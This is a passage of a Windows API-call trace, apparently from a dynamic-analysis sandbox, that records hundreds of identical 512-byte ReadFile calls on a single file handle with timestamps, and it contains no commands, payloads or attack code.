lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.395] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, 
lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile 
(in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.442] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 
[0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.443] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, 
lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, 
lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.444] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: 
lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.445] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, 
lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.446] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.447] ReadFile (in: hFile=0x54, 